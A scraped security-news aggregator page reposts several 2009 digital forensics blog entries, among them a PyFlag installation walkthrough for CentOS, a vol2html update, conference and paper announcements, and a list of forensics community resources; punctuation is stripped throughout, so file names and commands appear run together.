got tired of trying to get darcs installed on my CentOS box andinstead downloaded the PyFlag tarball The first thing you will haveto do is update Python on your box - I installed 261 by sourceYou must also install all packages mentioned earlier including MySQLfor Python and Sleuthkit:# yum install python-dateutil clamav clamav-server mysql mysql-devel mysql-server file-devel python-expect zlib zlib-devel openssl python-imagingYou may have a problem when you install MySQL for Python, however,when it tries to download the setuptools-*egg file If you havePython version 26 installed you need the following egg file:setuptools-06c9-py26eggYou can download this into your MySQL-python-122 directory andchange the name to setuptools-06c5-py26egg or you can muck aroundwith the ez_setuppy file However you want to do it# python26 setuppy build# python26 setuppy installNow, if you have Python 26 installed in addition to your defaultPython installation, you'll have to copy over some libraries to thenew location eg# cp -R /usr/lib/python24/site-packages/pexpectpy* /usr/local/lib/python26/site-packages/# cp -R /usr/lib/python24/site-packages/PIL /usr/local/lib/python26/site-packages/# cp -R /usr/lib/python24/site-packages/python-dateutil /usr/local/lib/python26/site-packages/# cp /usr/lib/python24/pyexpectpy* /usr/local/lib/python26/At this point you should be set to begin PyFlag installation# /configure# make installAt that point you are set to run PyFlag Don't forget to set up MySQL:# /sbin/chkconfig mysqld on# /sbin/service mysqld start# mysqladmin -u root password 'new-passwd'You must use quotes around the new-passwd you choose, and don't forgetwhat it isThen start PyFlag by typing "pyflag" without quotes at thecommandlineBy default PyFlag listens on port 8000 So simply open your browserand go to http://127001:8000 You can modify settings at this point:You will then have to initialize the database:After which you will see a success message:Now you are ready to start a new case, which you can do under casemanagementGive the case a name:and then you will see confirmation that your case is created:Now you can load your evidence In this case, I am loading a USBimage Type 0 zero for the offset and give your evidence some uniquename you'll remember and press submitIf things work out, you will Sleuthkit will identify the file systemtype in a mount point this could be anything, I'm using /usb but itcould be D: or whatever:You will then see the uploading dialogNote: DO NOT BE IMPATIENT Let it finish uploading You will noticethat it will refresh every now and then as it uploads more from thefilesystem It will then redirect to the analysis screen You can nowbrowse the filesystem:IMAGEhttp://www.secuobs.com/revue/news/97768.shtmlhttp://www.secuobs.com/revue/news/97768.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I have added a very small update to vol2html Other than fixing sometypos and cleaning up the code a little bit, I have added moreinformation about DLL filesLike the last update you can now see information about what processeshave the same dll openThere will be more however, I think that it might be better towrite a module for Volatility at this timeHere are vol2htmlpl and a new html reportLet me know if you find any bugs :-IMAGEhttp://www.secuobs.com/revue/news/97767.shtmlhttp://www.secuobs.com/revue/news/97767.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Jarek, Prof Bilal Khan BK and my paper on Permeate was accepted atIWCMC 2009 Computer and Network Security Symposium The final paperwill be available at the Permeate site after some final editingShouts to Jarek and BKIMAGEhttp://www.secuobs.com/revue/news/97766.shtmlhttp://www.secuobs.com/revue/news/97766.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I will attend and present at the CEIC conference in Orlando, FL Theagenda is available online and it looks like there will be a lot ofinteresting talks/labs to see and participate in It should be funIMAGEhttp://www.secuobs.com/revue/news/97765.shtmlhttp://www.secuobs.com/revue/news/97765.shtml Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Well, it's been a little while since I was last writing on here Thingshave been busy, but it will pick up on here soon ;-In the mean time, I'll post some interesting things I've come acrossI am personally always looking for more information on variouscomputer forensics/security topics After a recent conversation withsome friends of mine from the John Jay College forensics program abouthow one can keep up with changes in these fields, I thought I mightshare a few resources that I use Hopefully some of these links willbe interesting to some of you Instead of focusing on a particulartool, I'm going to focus on the human factor: where do you find peoplewho are interested/experts in these fields Where can you hear themtalk Where can you interact with them Where can you get furtherinformation about a particular subjectPodcasts / WebcastsThere are some interesting podcasts out there Most people alreadyknow about them, but what the heck, I'm going to list some anyway inalphabetical order:* Cyberspeak podcast* Exotic Liability* Forensic 4cast* Pauldotcom* Sans Webcasts* Talk ForensicsSANS' last webcast was a very good overview of what can beaccomplished with memory forensics Also Talk Forensics and PaulDotComrecently had two great podcasts with Harlan Carvey - the man ofWindows Forensics Exotic Liability is a fairly new security podcastthat is as extremely interesting and entertaining The nice thingabout most of these podcasts is that you can ask questions in realtime by online chat or by calling in to the showForums / ListservesWell, there are a ton of different forums/listserves for variousthings Here is a short list:Forums* Defcon forums* Forensic Focus Forums* Guidance Software forum* RegRipper forum* RootkitcomListserves* Linux Forensics Listserv* Metasploit Listserv* Volatility Users and Developers Listserves* Windows Forensics ListservBlogsThere are just too, too many to list So, I'll tell you what I'lldo I'll give you my edited Google Feeds xml file if you areinterested in finding more blogs If you use Google Reader you canjust import the file I've tried to split things up into 3 categories:Forensics, Technical Law and Security Some things overlap Don't beoffended if you own one of these blogs and aren't "listed correctly"One thing I like about using Google Reader is the ability to searchover the blog posts There are lots of times I remember readingsomething, but can't quite remember where I found it this helpsTwitterLots of computer forensics and security professionals can be found onTwitter I've enjoyed my time on twitter talking with everyone thereSince I'm afraid to leave anyone out, I'll abstain from listing anyoneat this point, but most of the people discussed above are on twitterand if you just search for security or forensics you'll end up findinga few more Also a lot of people who maintain blogs also post links totheir twitter profiles Now of course, there is always the chance thatsomeone could be "disinformational" either on purpose or not DidierStevens is not by the way ;- but more than likely you will learn alot from people and will keep up with current eventsLinkedInIn spite of some of the bad things that have happened on LinkedIn inthe past, it is a very helpful tool for networking and gaininginformation In addition to establishing contacts with others who arein your field, you can also join groups for your interests There areseveral computer forensics and security groups on LinkedIn that arevery "happening" as far as member participation Joining is easy Somegroups may have criteria about who may join, but you can search forgroups by subject and decide which ones fit your interestsWell, that's enough for now I'm going back to hang out on#volatility on ircfreenodenet ;-IMAGEhttp://www.secuobs.com/revue/news/97764.shtmlhttp://www.secuobs.com/revue/news/97764.shtml